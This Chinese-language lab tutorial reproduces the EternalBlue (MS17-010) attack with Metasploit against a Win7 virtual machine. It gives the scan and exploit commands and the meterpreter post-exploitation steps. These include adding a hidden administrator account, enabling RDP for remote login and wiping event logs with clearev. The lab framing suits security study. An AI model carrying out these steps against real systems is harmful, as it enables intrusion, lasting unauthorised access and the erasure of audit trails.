目录
准备靶机
测试ping连通性
攻击漏洞
利用漏洞
准备靶机
1台kali,1台win7
win7系统可以在MSDN镜像网站里获取
注:将win7安装好,win7无法安装vmtools,若升级系统,可能会把永恒之蓝补丁打上,所以建议别升级系统
测试ping连通性
win7的IP地址为192.168.164.129
kali的IP地址为192.168.164.130
将这两台机器互ping发现可以ping通
攻击漏洞
在kali系统里打开msf,每次打开msf的界面都不一样
msfconsole
搜索ms17_010
search ms17_010
其中0模块是漏洞攻击模块,对存在永恒之蓝漏洞的目标进行攻击,3模块为扫描漏洞模块,对目标是否存在永恒之蓝漏洞进行扫描
首先使用3模块扫描目标是否存在永恒之蓝漏洞
输入optinos可以查看获得相关信息帮助
设置目标主机rhosts
set RHOSTS 192.168.164.129
设置好后直接run即可
如图所示,信息提示说192.168.164.129存在ms17-010漏洞
在确定好存在漏洞后,可以返回使用0模块进行漏洞攻击
设置RHOSTS
进行攻击使用exploit
如果出现了meterpreter 代表攻击成功
利用漏洞
可以使用sysinfo显示远程主机信息
对远程主机进行截图操作
screenshot
获得shell控制台:shell
输入chcp 65001即可消除乱码
添加用户
net user test 123456 /add
net localgroup administrators test /add
启用远程桌面
run post/windows/manage/enable_rdp
使用rdesktop进行远程登录
rdesktop 192.168.164.129
输入刚刚添加的用户
远程登录成功
清除日志
clearev
文章来源:https://www.toymoban.com/news/detail-428577.html
文章来源地址https://www.toymoban.com/news/detail-428577.html
到了这里,关于复现永恒之蓝[MS17_010]的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!